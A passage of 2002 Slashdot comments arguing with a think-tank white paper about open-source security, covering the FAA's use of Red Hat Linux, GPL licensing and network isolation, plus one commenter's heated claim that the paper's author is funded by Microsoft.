    They already do. The FAA's Air Traffic Control Database uses Oracle 9i Real Application Clusters running on Dell PowerEdge servers and (surprise!) Red Hat Linux.
    Could the FAA take the chance that these unknown programmers have not shared the source code accidentally with the wrong parties?
    Apparently the FAA thinks it's a better gamble than hoping that no one with an old copy of debug.exe will find a buffer overflow in Windows 2000 Advanced Server.
    Would the FAA's decision to use software in the public domain invite computer 'hackers' more readily than proprietary products?"
    Again, you clearly demonstrate your lack of knowledge in this field, Mr. Brown. GPL software is NOT public domain. It is private property released for public use under license. It is no more public domain software than Windows XP. And ... in a more direct answer to your question ... Probably ... most of the 'script kiddies' I've encountered on the 'net have a burning desire to crack a Linux box and 0wn it. Do they manage to accomplish this desire? Not many of them.

    However, a more cogent inquiry would be "If the FAA's Air Traffic Control System is exposed to access from the public internet, shouldn't we fire all the boneheaded bureaucrats that decided it SHOULD be?"

    Most of the .mil TLD is not accessible from the public 'net, including ALL the most security-sensitive systems. These systems are isolated on a non-public backbone that you might be able to get to from the public internet if you were an EXTREMELY talented cracker, however, I'd be willing to bet that the FBI would be knocking on your door before you got through the third layer of firewalls and IDS's. Shouldn't something like the FAA's Air Traffic Control system be accorded the same level of security?

    Mr. Brown, your white paper exhibits a failure of understanding of your subject that I find very disappointing in one who would call his operation a "think-tank". You entitle your publication "Opening the Open-Source Debate," ... I will interpret that title as a challenge, and I accept. Debate me ... in the forum of your choice ...
  • by cOdEgUru ( 181536 ) on Monday June 10, 2002 @04:07PM (#3675193) Homepage Journal
    Of course this guy is funded under the table by Gates and his minions.

    I googled for Andre Carter of Irimi Corpn whose comments Mr. Kenneth (or whatever frickin name he has) values more than anything else and this is what I found :

    One pro-Microsoft observer credited Gates with being precise and helpful. "His testimony has been soaked with real-world examples, [and it shows] he understands the ramifications of how the states [want to affect his business]," said E. Andre Carter, CEO of Irimi, a Washington-based mobile and wireless consultancy, who also works for the pro-Microsoft lobbying group Americans for Technology Leadership.


    BINGO!

    When idiots like these make money by lying through their teeth, spread FUD and otherwise confuse the idiots who make decisions in the Senate and everywhere else, this industry, this country and the world we live in has such a fucked up future.
